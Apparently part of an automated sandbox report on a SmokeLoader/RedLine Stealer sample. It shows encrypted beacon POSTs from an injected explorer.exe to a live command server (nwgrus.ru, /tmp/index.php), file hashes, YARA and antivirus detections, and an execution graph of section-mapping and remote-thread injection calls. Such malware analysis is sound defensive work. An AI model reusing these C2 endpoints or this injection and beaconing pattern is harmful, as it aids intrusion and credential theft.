                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 140
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:15.990394115 CEST140OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3d 0a e5 f9
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu==cl/^#']p_UR>>Y`~
                                    Oct 13, 2024 17:05:16.825057983 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:16 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    46192.168.2.450048109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:21.868154049 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://qxdbxtuaolo.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 200
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:21.868169069 CEST200OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 19 de bd
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu+z<tFlboINbA_mGU+A~O2O&r<vi^2GMb{JOR
                                    Oct 13, 2024 17:05:23.062016010 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:22 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r
                                    Oct 13, 2024 17:05:23.062119961 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:22 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    47192.168.2.450049109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:27.911989927 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://nobwwkshognvggkp.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 353
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:27.911989927 CEST353OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 5b bc b8
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu;[DsT6:dr0y){10TdH5tGLlY/xZfnBoEY3WffBO.g=
                                    Oct 13, 2024 17:05:28.722807884 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:28 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    48192.168.2.450050109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:33.742224932 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://gafhlilcplomq.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 164
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:33.742224932 CEST164OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 44 f3 fb
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu"D=Yp@>/sM&*D[A:"1oVKE
                                    Oct 13, 2024 17:05:34.538161993 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:34 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    49192.168.2.450051109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:39.543642998 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://mwqmbajulrg.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 249
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:39.543716908 CEST249OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 24 5e d4 ed
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu$^tX]m=b!w-pQU*]9nY8E$u!DJI&P,+'O2W&zlcS7R"&}Uti]=9Q0&
                                    Oct 13, 2024 17:05:40.582794905 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:40 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    50192.168.2.450052109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:45.099385977 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wtfbpeudtpjocvd.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 119
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:45.099427938 CEST119OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 47 fa 99
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu_Gc1V6"tB5apAf
                                    Oct 13, 2024 17:05:45.894088030 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:45 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    51192.168.2.450053109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:49.937036037 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://lkewxsecdko.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 169
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:49.937036037 CEST169OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 50 af 82
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu7P8wtjr; P 5*v%H-YUKv+#AVQ5>*|Om
                                    Oct 13, 2024 17:05:50.726022005 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:50 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    52192.168.2.450054109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:55.284992933 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://sxnddulhpoyubn.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 146
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:55.284993887 CEST146OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 30 0a a7 be
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu0WdzZz"7XBx/20F1WG&%
                                    Oct 13, 2024 17:05:56.081058025 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    53192.168.2.450055109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:06:00.384315014 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://suevwuleoceiaguq.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 128
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:06:00.384349108 CEST128OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 3d c6 f7
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu]=)AB'gtl%^&oB/
                                    Oct 13, 2024 17:06:01.187680006 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:06:01 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    54192.168.2.450056109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:06:05.963869095 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://dyetfqbcutdwehk.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 301
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:06:05.963869095 CEST301OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 52 c2 e4
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu`RIHkEyT(o7G6:C3cxuFe**Sp"]Mr"#K<v<qq%N[+drmiw^&@WJv
                                    Oct 13, 2024 17:06:06.773713112 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:06:06 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:11:02:02
                                    Start date:13/10/2024
                                    Path:C:\Users\user\Desktop\FyDBXJE74v.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\FyDBXJE74v.exe"
                                    Imagebase:0x400000
                                    File size:296'960 bytes
                                    MD5 hash:497859EED941E073A43E8291908E6494
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:11:02:11
                                    Start date:13/10/2024
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff72b770000
                                    File size:5'141'208 bytes
                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:5
                                    Start time:11:02:28
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\wsbgrgh
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\wsbgrgh
                                    Imagebase:0x400000
                                    File size:296'960 bytes
                                    MD5 hash:497859EED941E073A43E8291908E6494
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 39%, ReversingLabs
                                    • Detection: 41%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:9.5%
                                      Dynamic/Decrypted Code Coverage:29.4%
                                      Signature Coverage:44.2%
                                      Total number of Nodes:163
                                      Total number of Limit Nodes:7
                                      execution_graph 3390 402e40 3392 402e37 3390->3392 3393 402edf 3392->3393 3394 4018e6 3392->3394 3395 4018f5 3394->3395 3396 40192e Sleep 3395->3396 3397 401949 3396->3397 3399 40195a 3397->3399 3400 401514 3397->3400 3399->3393 3401 401524 3400->3401 3402 4015c4 NtDuplicateObject 3401->3402 3411 4016e0 3401->3411 3403 4015e1 NtCreateSection 3402->3403 3402->3411 3404 401661 NtCreateSection 3403->3404 3405 401607 NtMapViewOfSection 3403->3405 3407 40168d 3404->3407 3404->3411 3405->3404 3406 40162a NtMapViewOfSection 3405->3406 3406->3404 3408 401648 3406->3408 3409 401697 NtMapViewOfSection 3407->3409 3407->3411 3408->3404 3410 4016be NtMapViewOfSection 3409->3410 3409->3411 3410->3411 3411->3399 3412 2bc003c 3413 2bc0049 3412->3413 3425 2bc0e0f SetErrorMode SetErrorMode 3413->3425 3418 2bc0265 3419 2bc02ce VirtualProtect 3418->3419 3421 2bc030b 3419->3421 3420 2bc0439 VirtualFree 3424 2bc04be LoadLibraryA 3420->3424 3421->3420 3423 2bc08c7 3424->3423 3426 2bc0223 3425->3426 3427 2bc0d90 3426->3427 3428 2bc0dad 3427->3428 3429 2bc0dbb GetPEB 3428->3429 3430 2bc0238 VirtualAlloc 3428->3430 3429->3430 3430->3418 3431 416360 3434 415f50 3431->3434 3433 416365 3435 415f5d 3434->3435 3436 416152 3435->3436 3437 416017 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3435->3437 3438 416160 SetCommState 3436->3438 3442 416179 3436->3442 3439 41607d 7 API calls 3437->3439 3438->3436 3440 416133 3439->3440 3441 41612a GetBoundsRect 3439->3441 3443 416143 3440->3443 3444 41613c PulseEvent 3440->3444 3441->3440 3445 416246 3442->3445 3446 416186 7 API calls 3442->3446 3443->3436 3444->3443 3457 415ba0 LocalAlloc 3445->3457 3453 41621a 3446->3453 3448 41624b LoadLibraryA 3458 415bd0 GetModuleHandleW GetProcAddress VirtualProtect 3448->3458 3451 41629d 3459 415ec0 3451->3459 3453->3445 3454 4162a2 3455 4162d9 InterlockedDecrement 3454->3455 3456 4162ef 3454->3456 3455->3454 3456->3433 3457->3448 3458->3451 3460 415ee9 QueryDosDeviceA 3459->3460 3461 415efa 3459->3461 3460->3461 3470 415d60 3461->3470 3464 415f15 3473 415da0 3464->3473 3465 415f0d FreeEnvironmentStringsA 3465->3464 3468 415f3c 3468->3454 3469 415f2c HeapDestroy GetNumaHighestNodeNumber 3469->3468 3471 415d71 FatalAppExitA GetModuleHandleW 3470->3471 3472 415d83 3470->3472 3471->3472 3472->3464 3472->3465 3474 415dad 3473->3474 3475 415dd9 3474->3475 3476 415dc8 BuildCommDCBA 3474->3476 3477 415de1 WritePrivateProfileStringA FreeEnvironmentStringsA 3475->3477 3478 415e03 3475->3478 3476->3478 3477->3478 3479 415e8a 3478->3479 3481 415e39 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3478->3481 3482 415d90 3478->3482 3479->3468 3479->3469 3481->3478 3485 415d20 3482->3485 3486 415d49 3485->3486 3487 415d3c SetEvent 3485->3487 3486->3478 3487->3486 3564 401542 3565 40153b 3564->3565 3566 4015c4 NtDuplicateObject 3565->3566 3575 4016e0 3565->3575 3567 4015e1 NtCreateSection 3566->3567 3566->3575 3568 401661 NtCreateSection 3567->3568 3569 401607 NtMapViewOfSection 3567->3569 3571 40168d 3568->3571 3568->3575 3569->3568 3570 40162a NtMapViewOfSection 3569->3570 3570->3568 3572 401648 3570->3572 3573 401697 NtMapViewOfSection 3571->3573 3571->3575 3572->3568 3574 4016be NtMapViewOfSection 3573->3574 3573->3575 3574->3575 3492 2ca0282 3493 2ca0291 3492->3493 3496 2ca0a22 3493->3496 3501 2ca0a3d 3496->3501 3497 2ca0a46 CreateToolhelp32Snapshot 3498 2ca0a62 Module32First 3497->3498 3497->3501 3499 2ca0a71 3498->3499 3502 2ca029a 3498->3502 3503 2ca06e1 3499->3503 3501->3497 3501->3498 3504 2ca070c 3503->3504 3505 2ca0755 3504->3505 3506 2ca071d VirtualAlloc 3504->3506 3505->3505 3506->3505 3623 402dd0 3626 402ddc 3623->3626 3624 402edf 3625 4018e6 8 API calls 3625->3624 3626->3624 3626->3625 3519 4018f1 3520 4018f6 3519->3520 3521 40192e Sleep 3520->3521 3522 401949 3521->3522 3523 401514 7 API calls 3522->3523 3524 40195a 3522->3524 3523->3524 3610 401915 3611 4018c6 3610->3611 3612 40191a 3610->3612 3613 40192e Sleep 3612->3613 3614 401949 3613->3614 3615 401514 7 API calls 3614->3615 3616 40195a 3614->3616 3615->3616 3488 402f97 3489 4030ee 3488->3489 3490 402fc1 3488->3490 3490->3489 3491 40307c RtlCreateUserThread NtTerminateProcess 3490->3491 3491->3489 3525 2bc0005 3530 2bc092b GetPEB 3525->3530 3527 2bc0030 3532 2bc003c 3527->3532 3531 2bc0972 3530->3531 3531->3527 3533 2bc0049 3532->3533 3534 2bc0e0f 2 API calls 3533->3534 3535 2bc0223 3534->3535 3536 2bc0d90 GetPEB 3535->3536 3537 2bc0238 VirtualAlloc 3536->3537 3538 2bc0265 3537->3538 3539 2bc02ce VirtualProtect 3538->3539 3541 2bc030b 3539->3541 3540 2bc0439 VirtualFree 3544 2bc04be LoadLibraryA 3540->3544 3541->3540 3543 2bc08c7 3544->3543 3600 402d7b 3602 402d38 3600->3602 3601 4018e6 8 API calls 3603 402dc7 3601->3603 3602->3600 3602->3601 3602->3603 3545 2bc0001 3546 2bc0005 3545->3546 3547 2bc092b GetPEB 3546->3547 3548 2bc0030 3547->3548 3549 2bc003c 7 API calls 3548->3549 3550 2bc0038 3549->3550 3551 4014fe 3552 401506 3551->3552 3553 401531 3551->3553 3554 4015c4 NtDuplicateObject 3553->3554 3563 4016e0 3553->3563 3555 4015e1 NtCreateSection 3554->3555 3554->3563 3556 401661 NtCreateSection 3555->3556 3557 401607 NtMapViewOfSection 3555->3557 3559 40168d 3556->3559 3556->3563 3557->3556 3558 40162a NtMapViewOfSection 3557->3558 3558->3556 3560 401648 3558->3560 3561 401697 NtMapViewOfSection 3559->3561 3559->3563 3560->3556 3562 4016be NtMapViewOfSection 3561->3562 3561->3563 3562->3563

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 415f50-415f78 2 415f80-415f87 0->2 3 415f89-415f8b 2->3 4 415f8f-415f95 2->4 3->4 5 415f97-415fa1 4->5 6 415fa6-415fb0 4->6 5->6 7 415fb2-415fbe 6->7 8 415fc8-415fcf 6->8 7->8 8->2 9 415fd1-415fd9 8->9 10 415fe0-415fe6 9->10 12 415ff4-415ffb 10->12 13 415fe8-415fee 10->13 14 416001-416008 12->14 15 415ffd 12->15 13->12 14->10 16 41600a-416011 14->16 15->14 17 416152-41615e 16->17 18 416017-416128 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 416160-41616e SetCommState 17->19 22 416133-41613a 18->22 23 41612a-41612d GetBoundsRect 18->23 24 416170-416177 19->24 25 416179-416180 19->25 26 416143-41614f 22->26 27 41613c-41613d PulseEvent 22->27 23->22 24->19 24->25 28 416246-416255 call 415ba0 25->28 29 416186-416240 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesW GetConsoleAliasExesLengthA GetBinaryType 25->29 26->17 27->26 35 416257-416268 28->35 36 41628d-416298 LoadLibraryA call 415bd0 28->36 29->28 38 416270-416280 35->38 40 41629d-4162ae call 415ec0 36->40 41 416282 38->41 42 416288-41628b 38->42 47 4162b0-4162b7 40->47 41->42 42->36 42->38 48 4162c3-4162c9 47->48 49 4162b9-4162bf 47->49 51 4162d0-4162d7 48->51 52 4162cb call 415bc0 48->52 49->48 55 4162e6-4162ed 51->55 56 4162d9-4162e0 InterlockedDecrement 51->56 52->51 55->47 58 4162ef-4162ff 55->58 56->55 59 416300-416310 58->59 60 416312 59->60 61 416319-41631c 59->61 60->61 61->59 62 41631e-416329 61->62 63 416330-416335 62->63 64 416337-41633d 63->64 65 41633f-416345 63->65 64->65 66 416347-416354 64->66 65->63 65->66
                                      APIs
                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00416022
                                      • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041603B
                                      • FindAtomW.KERNEL32(00000000), ref: 00416042
                                      • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041604A
                                      • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00416062
                                      • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00416089
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00416091
                                      • GetVersionExW.KERNEL32(?), ref: 0041609E
                                      • DisconnectNamedPipe.KERNEL32(?), ref: 004160B1
                                      • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004160F6
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00416105
                                      • LCMapStringA.KERNEL32(00000000,00000000,004183A0,00000000,?,00000000), ref: 0041611B
                                      • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 0041612D
                                      • PulseEvent.KERNEL32(00000000), ref: 0041613D
                                      • SetCommState.KERNELBASE(00000000,00000000), ref: 00416164
                                      • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00416195
                                      • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004161A6
                                      • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 004161AE
                                      • GetTimeFormatW.KERNEL32(00000000,00000000,?,004183D0,?,00000000), ref: 004161EE
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 004161F5
                                      • GetConsoleAliasExesLengthA.KERNEL32 ref: 004161FB
                                      • GetBinaryType.KERNEL32(004183E0,?), ref: 0041620D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825971161.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_40b000_FyDBXJE74v.jbxd
                                      Similarity
